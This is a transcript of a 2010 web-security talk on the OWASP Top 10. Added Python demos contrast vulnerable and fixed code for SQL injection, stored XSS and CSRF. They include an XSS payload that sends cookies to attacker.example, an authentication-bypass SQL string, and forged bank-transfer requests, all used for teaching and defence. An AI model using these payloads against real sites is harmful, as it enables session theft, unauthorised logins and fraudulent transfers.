Is the Web at Risk?

A very short presentation held at the WIP2 workshop in Lisbon. This presentation talks about the security trends on the new WWW.

Published in: Technology
Transcript

  • 1. is the web @ risk? World Internet Project Meeting 2010, ISCTE-IUL/SoTA/ADETTI-IUL. Carlos Serrão, Instituto Superior de Ciências do Trabalho e da Empresa / Instituto Universitário de Lisboa, School of Technology and Architecture, ADETTI-IUL. carlos.serrao@iscte.pt, carlos.j.serrao@gmail.com, http://www.carlosserrao.net, http://blog.carlosserrao.net, http://www.linkedin.com/in/carlosserrao
  • 2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  • 3. The Internet… … and the WWW, in the beginning.
  • 4. in the beginning... Vinton Gray Cerf Robert Elliot Kahn … a.k.a. the “Internet fathers”
  • 5. The Internet was created… … as a ubiquitous, decentralized, standardized, global, interconnected, digital communications channel.
  • 6. in the beginning... (Sir) Tim Berners Lee … a.k.a. the “WWW father”
  • 7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  • 8. growth
  • 9-11. evolving, growing network (three stages, read left to right on the slide; slides 10 and 11 repeat slide 9 as a build-up)
    stage 1: a small part of the data on a specific web site (or a limited number of web sites); applications on the desktop; most data is on the desktop; data processing on the desktop
    stage 2: large amounts of data on a large number of sites; applications on the desktop and on the Web; part of the data still on the desktop (and still on mobile); data processing on the desktop, but also on the web
    stage 3: data on the Cloud; applications on the Web and in the Cloud (more and more); data almost nonexistent on the desktop (and on mobile); data processing on the user side almost nonexistent
  • 12. security++: what do we have today? anti-virus; anti-malware; anti-spyware; firewalls; intrusion detection systems; … are they enough?
  • 13. security++: YES, but… do they protect the user from the web applications? Can a Web application be compromised to hurt legitimate users? Sure it can.
  • 14. security++: How? Do you trust your favorite web applications (Google, Gmail)? Do you trust your favorite social-web applications (Facebook, Twitter)? Do you trust your home banking? Do you trust your government web sites?
  • 15. security++: The security perimeter has huge security holes in the application layer. [Diagram: an APPLICATION ATTACK passes through the network layer (Firewall, Hardened OS, Firewall) and reaches the application layer: Web Server, App Server, Custom Developed Application Code, and behind them Legacy Systems, Web Services, Databases, Directories, Human Resources, Billing.]
  • 16. implications…
  • 17. security trends: problem types, typical problems on web apps
  • 18. the security risks http://www.owasp.org/index.php/Top_10
  • 19. security risks: considering the three most important: A1: Injection; A2: Cross Site Scripting (XSS); A5: Cross Site Request Forgery (CSRF)
  • 20-22. A1: Injection: what if? SELECT * FROM users usr WHERE usr.username = 'admin';--' AND usr.password='bb21158c733229347bd4e681891e213d94c685be' (the username admin';-- closes the string literal and the -- comments out the rest of the WHERE clause, so the password is never checked)
  • 23. any input from the web app user can be an attack vector
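The slide-21 query run for real, as an added example that is not code from the presentation: a login lookup built by string concatenation against an in-memory SQLite table, beside the same lookup with bound parameters. The users table, the demo password and its SHA-1 hash are constructed here; the slide's own hash value is not reused.

```python
"""SQL injection from slide 21: concatenated query versus bound parameters.

Added example, not from the presentation. The users table, the demo
password and the stored SHA-1 hash are constructed for this demo.
"""
import hashlib
import sqlite3

DEMO_PASSWORD = "correct horse battery staple"   # constructed demo password


def new_db():
    """In-memory users table with one constructed admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Stored the way the slide's query expects: a SHA-1 hex digest in the
    # password column (kept to mirror the slide; unsalted SHA-1 is not a
    # recommendation for real password storage).
    pw_hash = hashlib.sha1(DEMO_PASSWORD.encode()).hexdigest()
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)", ("admin", pw_hash)
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern behind slide 21: user input is pasted into the SQL text.

    With username admin';-- the statement becomes
      SELECT ... WHERE usr.username = 'admin';--' AND usr.password='...'
    so the password comparison is commented away and the admin row is returned.
    """
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = (
        "SELECT id, username FROM users usr WHERE usr.username = '"
        + username
        + "' AND usr.password = '"
        + pw_hash
        + "'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the driver sends the SQL and the
    values separately, so the payload can only ever be compared as a value."""
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = (
        "SELECT id, username FROM users usr "
        "WHERE usr.username = ? AND usr.password = ?"
    )
    return conn.execute(sql, (username, pw_hash)).fetchone()


def demo():
    """Run both lookups with the slide's payload and return the rows found."""
    conn = new_db()
    payload = "admin';--"   # the username from the slide
    return {
        "vuln_bad_password": login_vulnerable(conn, payload, "not the password"),
        "safe_bad_password": login_safe(conn, payload, "not the password"),
        "safe_good_password": login_safe(conn, "admin", DEMO_PASSWORD),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, row)
```

login_vulnerable returns the admin row for the payload with any password at all; login_safe returns nothing for the same input and only succeeds with the real password. Bound parameters (or an ORM that uses them) are the fix; input filtering on top of string concatenation is not.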
  • 24. A2: Cross Site Scripting (XSS): injecting a malicious payload into the web app from the end-user side, to be delivered to other users (victims)
  • 25. A2: Cross Site Scripting (XSS) [diagram: application with a stored XSS vulnerability] 1. Attacker sets the trap ("update my profile"): the attacker enters a malicious script into a web page that stores the data on the server. 2. Victim views the page and sees the attacker's profile: the script runs inside the victim's browser with full access to the DOM and cookies. 3. The script silently sends the victim's session cookie to the attacker.
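Slide 25's three steps in miniature, as an added example that is not from the presentation: a profile store, a renderer that splices the stored text straight into the page, and the output-encoded variants for the text and the attribute context, with Python's html.parser standing in for the victim's browser so the effect is checkable. The profile store, both payloads and the host attacker.example are constructed for the demo.

```python
"""Stored XSS from slide 25: splicing user data into HTML versus output encoding.

Added example, not from the presentation. The profile store, the two
payloads and the host attacker.example are constructed for this demo.
"""
import html
from html.parser import HTMLParser

# In-memory profile store (constructed). Storing the raw text is not the
# defect; rendering it without output encoding is.
PROFILES = {}

# Step 1 on the slide: the attacker's "about me" text ships the viewer's cookie out.
TEXT_PAYLOAD = (
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
)
# Payload for the attribute context: no angle brackets at all, only a quote breakout.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def save_profile(user, about_me):
    PROFILES[user] = about_me


def render_text_vulnerable(user):
    """Splices the stored text into the page; step 2: it runs in every viewer's browser."""
    return "<p>About " + user + ": " + PROFILES[user] + "</p>"


def render_text_safe(user):
    """HTML text context: encode & < > and quotes, so the same bytes become inert text."""
    return "<p>About " + html.escape(user) + ": " + html.escape(PROFILES[user]) + "</p>"


def render_attr_vulnerable(user):
    """A common half-fix: escapes < > & but not quotes, which is what matters inside value="..."."""
    return '<input name="about" value="' + html.escape(PROFILES[user], quote=False) + '">'


def render_attr_safe(user):
    """Attribute context: quotes must be encoded as well (html.escape's default)."""
    return '<input name="about" value="' + html.escape(PROFILES[user], quote=True) + '">'


class _TagCollector(HTMLParser):
    """Oracle for the demo: which tags and attributes a browser-like parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def demo():
    """Render the attacker's profile four ways and report what the parser sees."""
    save_profile("mallory", TEXT_PAYLOAD)
    text_vuln = [tag for tag, _ in parse_tags(render_text_vulnerable("mallory"))]
    text_safe = [tag for tag, _ in parse_tags(render_text_safe("mallory"))]
    save_profile("mallory", ATTR_PAYLOAD)
    attr_vuln = parse_tags(render_attr_vulnerable("mallory"))[0][1]
    attr_safe = parse_tags(render_attr_safe("mallory"))[0][1]
    return {
        "text_vulnerable_tags": text_vuln,            # a <script> element appears
        "text_safe_tags": text_safe,                  # only the <p>
        "attr_vulnerable_attrs": sorted(attr_vuln),   # autofocus and onfocus were injected
        "attr_safe_attrs": sorted(attr_safe),         # only name and value
    }


if __name__ == "__main__":
    for name, seen in demo().items():
        print(name, seen)
```

The attribute case is why "escape angle brackets" alone is not a fix: the payload contains none, and the quote is enough to add an event handler. Encode for the context the data lands in (text, attribute, URL, JavaScript), which is what a templating engine's auto-escaping does for you.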
  • 26. A5: Cross Site Request Forgery (CSRF): an attacker can build their own malicious website and initiate requests from the user's browser
  • 27. A5: Cross Site Request Forgery (CSRF) [diagram: application with a CSRF vulnerability] 1. Attacker sets the trap on some website on the internet (or simply via an e-mail): a hidden <img> tag contains the attack against the vulnerable site. 2. While logged into the vulnerable site, the victim views the attacker's site: the <img> tag is loaded by the browser, which sends a GET request (including credentials) to the vulnerable site. 3. The vulnerable site sees a legitimate request from the victim and performs the action requested.
  • 28. A5: Cross Site Request Forgery (CSRF) Alice transfers 100€ to Bob through bank.com: POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19; acct=BOB&amount=100. The pirate realizes that the same bank.com web application can execute the transfer using a URL with parameters: GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1. The pirate will try to use Alice to transfer 100,000€ to the pirate's own account: http://bank.com/transfer.do?acct=MARIA&amount=100000. The pirate sends an HTML email to Alice with a URL to click: <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>, or sends an HTML email to Alice with an image to hide the attack: <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">. If Alice is authenticated at bank.com with an active session, the transfer is performed.
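The bank.com scenario from slide 28 as an added example (not the presentation's code): transfer.do implemented twice over an in-memory session and account store, once as on the slide and once requiring POST plus a per-session synchronizer token, then exercised with the request the hidden <img> makes Alice's browser send, with a cross-site auto-submitted form, and with Alice's genuine transfer. The session id, the server secret and the balances are constructed.

```python
"""CSRF from slide 28: transfer.do as on the slide, and hardened.

Added example, not from the presentation. SESSIONS, SERVER_SECRET and the
balances are constructed; the request dicts stand in for HTTP requests.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; a real server loads it from config
SESSIONS = {"s3ss10n-alice": "ALICE"}     # session cookie value -> account holder (constructed)
BALANCES = {}                             # account -> balance in euro, filled by reset_balances()


def reset_balances():
    BALANCES.clear()
    BALANCES.update({"ALICE": 200000, "BOB": 0, "MARIA": 0})


def csrf_token(session_id):
    """Synchronizer token bound to the session: unguessable, and a cross-site
    page cannot read it because the same-origin policy keeps it from the attacker."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _do_transfer(src, dst, amount):
    if dst not in BALANCES or BALANCES[src] < amount:
        return "400 bad transfer"
    BALANCES[src] -= amount
    BALANCES[dst] += amount
    return "ok"


def transfer_vulnerable(request):
    """transfer.do as on the slide: the cookie alone authorises it, and GET works too."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return "401 not logged in"
    params = dict(parse_qsl(urlsplit(request["url"]).query))
    params.update(request.get("form", {}))
    return _do_transfer(user, params["acct"], int(params["amount"]))


def transfer_hardened(request):
    """Same endpoint with two checks: POST only, and a per-session CSRF token in the body."""
    session_id = request["cookies"].get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return "401 not logged in"
    if request["method"] != "POST":
        return "405 state change needs POST"
    form = request.get("form", {})
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return "403 bad csrf token"
    return _do_transfer(user, form["acct"], int(form["amount"]))


# What Alice's browser sends when it loads the attacker's hidden
# <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000">:
# the browser attaches her cookie, the attacker's page supplies nothing else.
FORGED_IMG_GET = {
    "method": "GET",
    "url": "http://bank.com/transfer.do?acct=MARIA&amount=100000",
    "cookies": {"session": "s3ss10n-alice"},
}
# Same attack via an auto-submitted cross-site form: now a POST, still no token.
FORGED_FORM_POST = {
    "method": "POST",
    "url": "http://bank.com/transfer.do",
    "cookies": {"session": "s3ss10n-alice"},
    "form": {"acct": "MARIA", "amount": "100000"},
}
# Alice's genuine 100 euro transfer to Bob; the token came from the form bank.com rendered for her.
LEGIT_POST = {
    "method": "POST",
    "url": "http://bank.com/transfer.do",
    "cookies": {"session": "s3ss10n-alice"},
    "form": {"acct": "BOB", "amount": "100", "csrf_token": csrf_token("s3ss10n-alice")},
}


def demo():
    """Replay the three requests against both handlers and report the outcomes."""
    out = {}
    reset_balances()
    out["vulnerable_forged"] = transfer_vulnerable(FORGED_IMG_GET)
    out["vulnerable_balances"] = dict(BALANCES)
    reset_balances()
    out["hardened_forged_get"] = transfer_hardened(FORGED_IMG_GET)
    out["hardened_forged_post"] = transfer_hardened(FORGED_FORM_POST)
    out["hardened_legit"] = transfer_hardened(LEGIT_POST)
    out["hardened_balances"] = dict(BALANCES)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Against the slide's handler the one-pixel image moves 100,000€ to MARIA. Refusing GET for state changes stops the <img> trick but not a cross-site auto-submitted form, which is why the token check is the part that actually closes the hole; SameSite cookies are a complementary defence in modern browsers, not a replacement for it.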
  • 29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  • 30. [quick] conclusions: take extra care with the web applications you trust your data to; take extra care in the way you handle your email; always be suspicious of anything "strange" on the web; web app developers, take care with what you do: your code is part of the security perimeter.
